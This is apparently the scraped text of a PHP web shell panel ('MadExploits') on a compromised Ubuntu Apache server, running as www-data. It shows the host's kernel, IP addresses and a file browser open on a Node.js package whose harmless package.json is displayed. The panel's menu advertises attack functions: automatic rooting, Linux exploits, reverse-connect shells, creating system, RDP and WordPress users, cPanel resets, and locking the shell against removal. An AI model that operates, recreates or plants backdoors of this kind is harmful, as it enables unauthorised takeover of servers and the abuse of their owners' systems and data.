Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.104
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
ansi-align /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.3
KB
-rw-r--r--
package.json
926
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ansi-align", "version": "3.0.0", "description": "align-text with ANSI support for CLIs", "main": "index.js", "scripts": { "pretest": "standard", "test": "nyc ava", "coverage": "nyc report --reporter=text-lcov | coveralls", "release": "standard-version" }, "files": [ "index.js" ], "repository": { "type": "git", "url": "git+https://github.com/nexdrew/ansi-align.git" }, "keywords": [ "ansi", "align", "cli", "center", "pad" ], "author": "nexdrew", "license": "ISC", "bugs": { "url": "https://github.com/nexdrew/ansi-align/issues" }, "homepage": "https://github.com/nexdrew/ansi-align#readme", "dependencies": { "string-width": "^3.0.0" }, "devDependencies": { "ava": "^1.0.1", "chalk": "^2.4.1", "coveralls": "^3.0.2", "nyc": "^13.1.0", "standard": "^12.0.1", "standard-version": "^4.4.0" } }
Close